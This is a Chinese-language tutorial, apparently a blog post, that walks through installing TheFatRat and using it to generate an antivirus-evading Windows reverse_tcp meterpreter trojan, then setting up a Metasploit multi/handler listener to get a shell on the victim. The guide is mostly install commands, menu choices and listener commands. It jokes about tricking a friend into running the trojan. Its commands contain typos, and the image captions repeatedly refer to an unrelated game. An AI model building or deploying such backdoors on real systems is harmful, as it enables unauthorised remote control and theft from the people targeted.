在这篇文章中,我将教大家如何使用TheFatRat这款工具。这款工具可以帮大家构建后门程序,以及执行后渗透利用攻击等等。在主流Payload的帮助下,这款工具可以生成质量非常高的恶意软件,而这些恶意软件可以在Windows、Android和macOS平台上运行。

自动化metasploit功能

还具备下列特点

1. 针对Windows、Linux、Mac和Android创建后门;

2. 后门可绕过反病毒产品;

3. 检测/开启Metasploit服务;

4. 针对Windows、Linux、Android和macOS创建meterpreterreverse_tcp Payload;

5. 开启多个meterpreter reverse_tcp监听器;

6. Searchsploit快速搜索;

7. 绕过反病毒产品;

8. 使用其他技术创建后门;

9. 自动运行监听器脚本;

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(1)

安装指南

git clone https://github.com/Screetsec/TheFatRat.git cd Fatrat

提取lalin-master to your home or another folder

chmod x fatrat

接下来,我们需要提供执行权限并运行setup.sh。

chmod x setup.sh && ./setup.sh 安装结束过后,会让你选择是否生成桌面图标,建议生成,安装过程全部自动化会自动下载未满足的插件

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(2)

启动完成图

自动生成木马

选择1号选项

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(3)

然后选择你想生产的木马的针对系统,这里我使用win的靶机,选择2选项

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(4)

上方贴心的写出了你在去区域网中的ip地址,直接复制粘贴即可。

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(5)

在这里我们需要输入我们想生成的木马名,我输入test

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(6)

在这里我们需要注意,我们是主动链接还是被动链接,都有一定的用法,不过,在区域网中,显然第3个选项比较适合,输入3

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(7)

系统便开始自动生成和加密(几乎无用)一个木马,生成好后,到这个文件夹下找。

/root/TheFatRat/output/

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(8)

随后我们就可以使用这个木马了,比如让你的好朋友点击一下,哈哈哈。

这里我们就直接放到虚拟机中运行。

在点击之前,我们需要设置msf的监听

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(9)

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 刚刚设置的ip set lport 刚刚设置的端口

输入exploit,开始监听。然后运行木马,就可以获取到目标主机的shell了。

矮子雷教学cf端游(TheFatRatMsfvenom傻瓜化小白也可以学渗透)(10)

,